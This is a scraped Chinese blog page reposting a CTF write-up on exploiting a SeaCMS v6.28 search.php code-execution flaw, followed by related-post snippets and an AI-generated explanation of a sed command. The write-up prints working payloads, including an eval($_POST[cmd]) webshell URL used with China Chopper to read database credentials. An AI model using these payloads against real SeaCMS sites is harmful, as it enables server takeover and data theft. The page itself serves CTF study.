i春秋——“百度杯”CTF比赛 九月场——Test(海洋cms / seacms 任意代码执行漏洞)...

最新推荐文章于 2025-02-26 16:11:58 发布
最新推荐文章于 2025-02-26 16:11:58 发布
阅读量701 收藏 1
点赞数 1
CC 4.0 BY-SA版权
文章标签: php 数据库 shell
原文链接:http://www.cnblogs.com/leixiao-/p/9786034.html
本文详细介绍了海洋CMS v6.28版本中存在的命令执行漏洞,通过特定的URL参数实现远程代码执行。文章展示了如何利用此漏洞执行系统命令,并最终获取数据库配置文件及敏感信息。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

打开发现是海洋cms,那就搜索相关漏洞

 

找到一篇介绍海洋cms的命令执行漏洞的文章:https://www.jianshu.com/p/ebf156afda49

直接利用其中给出的poc

/search.php

searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();

 

可以执行系统命令

 

 

没找到flag,考虑可能在数据库中,想上传一句话,然后用菜刀查数据库来着,但是没有写文件的权限,手动查数据库感觉太麻烦,所以换个exp

海洋cms v6.28命令执行漏洞 : https://www.uedbox.com/seacms-v628-0day/

/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

菜刀直接连接

找了好久终于找到数据库配置文件

编辑该条shell配置如下

 

最后得到flag

转载于:https://www.cnblogs.com/leixiao-/p/9786034.html

i春秋百度CTF比赛 九月 Test
include_heqile的博客
09-17 1090
https://www.ichunqiu.com/battalion?t=1&r=0 这道题还是蛮不错的,下面我来说一下解题思路 首先进入题目链接,然后搜索seacms相关漏洞,我直接使用了百度出来的第一条,freebuf上的一篇文章: http://www.freebuf.com/vuls/150042.html 漏洞利用方式如下: 我们把eval改成system,把9[]...
百度CTF比赛 九月--Web--Test--Seacms海洋漏洞
残阳泼茶香的博客
04-30 2109
Web题目名称:Test 题目内容: 善于查资料,你就可以拿一血了。 给了我们一个链接 打开就是海洋cms的模板,通过 查百度发现海洋的一个search.php漏洞 Seacms漏洞分析利用复现 By Assassin ichunqiu 通过这两个 复现漏洞(注意 这里 get post 都可以) http://53290ec71e554551a257d1a5ce00ab1...
百度CTF比赛 九月 | TEST
g1ut_t0ny的博客
07-04 420
TEST 1、题目提示会查资料就可以拿一血 2、打开题目很明显是海洋CMS,所以直接搜索他的相关漏洞 3、由于我做题比较晚,所以很明显,等待我的只能是一堆wp 4、白嫖开始 5、在common.inc.php中找到了数据库的相关信息,添加配置 6、管理数据库 ...
百度CTF比赛 九月_Test海洋cms前台getshell
a173262565的博客
04-22 530
题目在i春秋ctf训练营 又是一道cms的通用漏洞的题,直接去百度查看通用漏洞 这里我使用的是以下这个漏洞海洋CMS V6.28代码执行0day 按照给出的payload,直接访问url+/search.php?searchtype=5&tid=&area=eval($_POST[1]) 之后用菜刀连接,但乍一看并没有flag.php 反手去查了...
seacmsv9 SQL注入漏洞
Idealismi的博客
02-26 875
海洋影视管理系统(seacms海洋cms)是一套专为不同需求的站长而设计的。此时我们可以通过构造报错注入进行,查看是否可以注入出user;系统,采用的是 php5.X+mysql 的架构。:MySQL XML处理函数,用于触发错误。按 1 排序则首字母为 a,否则按 2。若按 1 排序,说明表名以 a 开头。二、通过 ASCII 码精准推断字符。若分组成功,说明子查询返回有效数据。1,通过正则表达式逐字符匹配数据。参数进行注入恶意的SQL语句。经过注入后,发现报错注入成功。六、通过联合查询直接回显数据。
海洋cms漏洞——search.php
qq_40554015的博客
02-13 5370
在i春秋CTF的题,有一道“百度CTF比赛 九月的题叫做Test,是web类型。 打开发现是海洋CMS: 看到是cms,立马搜了一下海洋CMS漏洞,发现网上很多,主要是search.php存在漏洞。 开始解题: 1.在查询栏随便点一个: 看到这么一个url,可以构造一个payload: 不是很清楚为什么······ 2.菜刀连接 接下来就可以直接用菜刀连接了 没有flag,应该在数据库中, 找到search.php,打开看看: 发现包含了common.php
i春秋百度CTF比赛 九月 XSS平台
include_heqile的博客
09-10 4866
https://www.ichunqiu.com/battalion?t=1 这道题是一道代码审计题,对于我这个萌新来说,不看大佬们的writeup是根本无从下手的,得到的提示就是github上的开源项目Rtiny:https://github.com/r0ker/Rtiny-xss/tree/master 大佬们是通过构造非法参数来让网页返回错误信息的,如下: 然后就可以搜索到这个项目...
i春秋百度CTF比赛 十月 Gift
include_heqile的博客
10-24 2584
https://www.ichunqiu.com/battalion?t=1&r=0 进入题目链接,是一张黑人问号图片: 直接使用burp suite抓包送到Repeater模块,检查发送和相应报文的HTTP头部字段,并未发现可疑字段,图片是base64编码,点击href链接,依然还是刚的页面,尝试更改请求方法,将GET更改为POST,响应如下: 如果了解过Django的话应该很容易看...
i春秋百度CTF比赛 十月 Backdoor
include_heqile的博客
09-20 3014
https://www.ichunqiu.com/battalion?t=1&r=0 这道题应该是我目前遇到的最有难度的一道题了,不过解题过程很有意思 首先还是进入题目链接,根据题目提示去查看网站目录下的敏感文件,我尝试了flag.php,但并未得到有价值的提示,然后我们再尝试一下敏感目录,当我在Challenges下输入.git的时候,出现了403 Forbidden错误,说明网站中存在...
百度CTF比赛 九月-----Test
大方子
08-02 1456
========================================= 个人收获: 1.连接shell 失败的时候可以试试多个版本的菜刀,可能是菜刀的问题 2.学会了菜刀数据库管理的配置 ============================================ 题目界面: 这个是个cms,我就直接百度查询到现成的漏洞 漏洞地址:http://0day5...
Seacms V12.9
weixin_65219040的博客
06-18 1318
通过定位file_get_contents()函数:找寻有可控变量的文件: 进入后台这个页面: 因为已经登入后台,所以找存储型的XSS,在扩展中添加广告,友情链接这些地方进行尝试:直接修改海洋cms名称,拼接js, 存储型XSS: 前台页面:尝试添加系统管理员: 构造poc: 在另一浏览器打开: 网页打开admin_template.php,添加参数action=del&filedir=../templets/default/html/../../../test.php。设置打开这个网页就进行自动
i春秋CTF训练 Web Test
椰奶冻不安全的博客
07-05 1785
Web Test 题目内容:善于查资料,你就可以拿一血了。 题目链接请在i春秋申请 根据提示直接在搜索引擎上查询海洋cms漏洞,发现曾经有过前台getshell,用poc试一下 searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpa
Seacms漏洞
Grey的博客
07-10 5216
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 4393
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
i春秋 WEB test
A_dmin的博客
06-11 579
i春秋 WEB test 一天一道CTF题目,能多不能少 打开网页发现是一个海洋cms搭建的平台,然后根据提示: 十有八九是查找海洋cms漏洞,那就直接百度吧!! 找到以下几个: 海洋CMS V6.28 命令执行 0DAY Seacms v6.45 漏洞复现 海洋cms v6.53 v6.54版本漏洞复现 要么是命令执行,要么是getshell 先测试命令执行: searchtype=5&am...
seacms海洋cms漏洞
YouthBelief的博客
10-29 7136
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
CTF--CMS漏洞总结
热门推荐
woshisz0413的博客
11-27 1万+
CMS漏洞总结 CMS类型题目: 首先判断CMS类型,再查询该CMS曾经出现的漏洞,利用漏洞获取用户名(admin)、密码后进入管理员界面查找注入; 或者上传一句话木马后使用菜刀连接,可能再连接数据库(1)CMSEASY类型 可用公开漏洞网站:https://www.seebug.org/appdir/CmsEasy 1.cmseasy 无限制报错注入 步骤:向http://*****/cel...
安洵 --writeup
Kr的博客
11-26 3110
web: only d0g3er can see flag 这个打开一个是一个海洋cms,通过百度,在search.php有一个代码执行漏洞 直接构造payload: http://138.68.2.14/seacms/search.php?searchtype=5 POST: searchword=searchword={if{searchpage:year}&year=:e{...
Seacms漏洞分析利用复现 By Assassin
Assassin
08-03 1万+
碰到了cms,之前一直没有真正的分析过,趁着没事干准备复现一个seacms漏洞复现,但是经过一系列的苦痛挣扎发现—–搭个环境神特么难…一开始我想用ubuntu直接搭建,但是我用的是php7,而各大seacms的安装指南上说…===必读提示=== ------------------------------------- 【1】自适应模板不支持IE6/7/8古董浏览器,会发生错误。国内双核浏览器的兼
sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php解释代码
最新发布
03-22
<think>好的,我现在要解释用户提供的这个sed命令:`sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php`。用户可能不太熟悉sed的使用,所以我需要一步步拆解,确保解释清楚每个部分的作用。 首先,我应该确定用户了解sed是什么。Sed是一个流编辑器,用于处理文本文件,执行查找替换等操作。用户可能在CTF或者某种部署环境中遇到这个命令,用来动态替换文件中的某个标志。 接下来,分解命令的结构。命令中的`-i`选项代表直接修改文件,而不是输出到终端。然后替换命令的结构是`s/原字符串/新字符串/`,这里原字符串是`flag{testflag}`,而新字符串是环境变量`$GZCTF_FLAG`的值。目标文件是`/var/www/html/index.php`。 需要注意,用户可能对正则表达式或环境变量的使用不太熟悉。这里替换的是精确匹配的字符串`flag{testflag}`,所以不需要正则的特殊字符。而环境变量`$GZCTF_FLAG`在双引号中会被展开,所以实际替换的是该变量的值。如果变量未设置,可能会导致替换为空,需要提醒用户注意这一点。 另外,权限问题也可能存在,修改`/var/www/html/index.php`可能需要足够的权限,用户可能需要使用sudo或者确保执行用户有写权限。 用户可能的疑问点包括:-i选项的作用、替换语法、环境变量的引用方式、文件路径的重要性以及权限问题。我应该逐一解释这些部分,并给出实际例子帮助理解。 最后,确认这个命令的典型使用景,比如在CTF竞赛中动态替换flag,或者在部署时配置文件中替换占位符。同时提醒潜在的问题,比如环境变量未设置导致替换错误,或者文件路径不正确等。</think>以下是对命令 `sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php` 的逐步解释: --- ### **1. 命令结构拆解** ```bash sed # 流文本编辑器工具 -i # 直接修改文件内容(in-place edit) "s/flag{testflag}/$GZCTF_FLAG/" # 替换操作指令 /var/www/html/index.php # 目标文件路径 ``` --- ### **2. 核心功能说明** - **用途**:将文件 `/var/www/html/index.php` 中所有 `flag{testflag}` 字符串替换为环境变量 `$GZCTF_FLAG` 的值。 - **典型景**:CTF竞赛中动态注入Flag,或配置文件模板的占位符替换。 --- ### **3. 关键参数详解** #### **`-i` 参数** - **作用**:直接修改源文件(不生成备份文件)。 - **对比**:若使用 `-i.bak` 会生成 `index.php.bak` 备份文件。 #### **替换指令 `s/pattern/replacement/`** - `s`:替换操作符(substitute)。 - `flag{testflag}`:需要被替换的固定字符串(精确匹配)。 - `$GZCTF_FLAG`:环境变量的值(通过双引号 `" "` 解析变量)。 --- ### **4. 环境变量注意事项** - **变量展开**:需确保命令在 `$GZCTF_FLAG` 已定义的环境中执行。 ```bash # 示例:提前设置环境变量 export GZCTF_FLAG="flag{real_flag}" ``` - **空值风险**:若变量未定义,会替换为空字符串(需验证变量是否存在)。 --- ### **5. 文件路径验证** - **路径检查**:确保目标文件 `/var/www/html/index.php` 存在且可写。 - **权限问题**:可能需要 `sudo` 权限(取决于文件所有权): ```bash sudo sed -i "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php ``` --- ### **6. 实际执行示例** 假设环境变量 `GZCTF_FLAG` 的值为 `flag{abc123}`,文件内容: ```php <?php $secret = "flag{testflag}"; ?> ``` 执行命令后,文件内容将变为: ```php <?php $secret = "flag{abc123}"; # 替换成功 ?> ``` --- ### **7. 常见问题排查** 1. **替换未生效**: - 检查文件路径是否正确。 - 确认环境变量是否导出(可通过 `echo $GZCTF_FLAG` 验证)。 2. **权限拒绝**: ```bash ls -l /var/www/html/index.php # 查看文件权限 chmod 644 /var/www/html/index.php # 调整权限(需管理员权限) ``` 3. **特殊字符冲突**: - 若变量值包含 `/`,需修改分隔符(例如改用 `#`): ```bash sed -i "s#flag{testflag}#$GZCTF_FLAG#" /path/to/file ``` --- ### **8. 安全建议** - **备份文件**:建议首次执行时添加备份后缀: ```bash sed -i.bak "s/flag{testflag}/$GZCTF_FLAG/" /var/www/html/index.php ``` - **正则匹配**:若需模糊匹配(如动态Flag),可改用正则表达式: ```bash sed -i "s/flag{.*}/$GZCTF_FLAG/" /path/to/file ``` --- 通过以上步骤,您可以准确理解该命令的作用机制,并应对实际使用中的各类景和问题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值